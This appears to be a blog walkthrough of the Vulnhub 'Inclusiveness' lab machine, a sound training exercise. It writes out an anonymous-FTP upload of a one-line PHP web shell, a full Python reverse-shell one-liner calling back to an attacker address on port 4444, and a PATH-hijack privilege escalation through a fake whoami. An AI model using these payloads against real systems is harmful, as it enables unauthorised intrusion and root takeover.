Vulnhub – Inclusiveness Walkthrough

We start scanning the host with nmap –A –T4 –p- 192.168.1.10 –vv

Then we scan it with dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt

The robots.txt file:

We can bypass this by following this article https://www.howtogeek.com/113439/how-to-change-your-browsers-user-agent-without-installing-any-extensions/

Now we reload Firefox:

We enter the path /secret_information:

Ok the ftp port is open and it’s writable, we can login using anonymous as the username and password:

There is a folder pub it’s writable and executable, we can upload a shell there to gain an access

Uploaded different ones and then I got a connection:

Inside the shell.php put this code : <?php system($_GET[‘shell’]);?> then upload it to the ftp service.

As we can see we can have a shell and got id of the system, now we can get a shell using a python script:

The python script: python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.11”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

In the home folder a user named Tom, there is a script rootshell when we run it it checks if we are Tom or not.

Now have a PATH abusing situation here, we can do it in a simple way writing the following commands:

cd /tmp

echo “printf “tom”” > whoami

chmod 777 whoami

export PATH=/tmp:/$PATH

echo path

cd /home/tom

./rootshell

cd /root

cat flag.txt

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s